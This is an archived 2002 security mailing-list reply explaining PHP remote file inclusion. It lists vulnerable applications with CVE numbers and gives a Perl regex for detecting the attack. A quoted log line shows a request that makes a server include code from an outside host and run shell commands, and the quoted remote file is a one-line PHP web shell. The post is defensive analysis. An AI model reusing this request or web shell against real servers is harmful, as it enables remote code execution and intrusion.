Re: Good practicle php attack example

From: Steven M. Christey (coleyat_private)
Date: Wed Sep 18 2002 - 19:49:26 PDT

Next message: Johannes Ullrich: "Re: Linux Slapper Worm and Linksys"

Previous message: James Williams: "Linux Slapper Worm and Linksys"
Maybe in reply to: zeno: "Good practicle php attack example"
Next in thread: Steven M. Christey: "Re: Good practicle php attack example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

zeno <bugtraqat_private> said:

>I figured a few people may find this interesting.
>
>
>200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
>
>contents of www.jtecx.hpg.com.br/jtec.txt
>
>------------------- start snip
>
><?php 
>system($cmd); 
>?>
>
>------------------- end snip

A number of PHP scripts have demonstrated this type of vulnerability,
which was documented in "A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP Applications" by Shaun Clowes; see
http://www.securereality.com.au/studyinscarlet.txt
(http://www.zend.com/zend/art/art-oertli.php also looks useful).  This
has been a topic of discussion on the webappsec list.

Basically, PHP can allow the programmer to access files from remote
sites.  PHP scripts that don't properly filter arguments to an
"include" command can have a remote URL injected by the attacker.  PHP
also allows you to define variables as a parameter (field) into the
script.  The combination of these factors makes it easy for an
attacker to execute code in the vulnerable application.  Note: this
may be dependent on configuration and/or the PHP version.

Some vulnerable applications are:


  BUGTRAQ:20001125 Security problems with TWIG webmail system
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
  (CVE: CVE-2000-1166)

  BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
  (CVE: CAN-2002-0206)

  [this could be the vulnerability being exploited in zeno's example]

  BUGTRAQ:20020506 b2 php remote command execution
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
  (CVE: CAN-2002-0734)

  BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
  (CVE: CAN-2002-0764)


A generic Perl regular expression to catch some of these exploits is:

  /\.php[2-9]?\?.*=http:\/\//

This seems to do a good job, although it could generate some false
positives for valid PHP scripts that pass URLs as arguments, e.g. for
redirecting the user out of the site.

- Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Johannes Ullrich: "Re: Linux Slapper Worm and Linksys"
Previous message: James Williams: "Linux Slapper Worm and Linksys"
Maybe in reply to: zeno: "Good practicle php attack example"
Next in thread: Steven M. Christey: "Re: Good practicle php attack example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Sep 19 2002 - 08:50:11 PDT